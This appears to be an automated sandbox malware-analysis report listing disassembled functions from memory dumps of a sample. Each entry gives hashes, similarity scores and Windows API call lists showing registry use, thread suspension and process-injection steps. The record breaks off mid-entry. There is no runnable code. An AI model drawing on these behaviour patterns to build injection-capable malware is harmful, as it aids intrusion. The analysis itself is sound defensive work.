  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
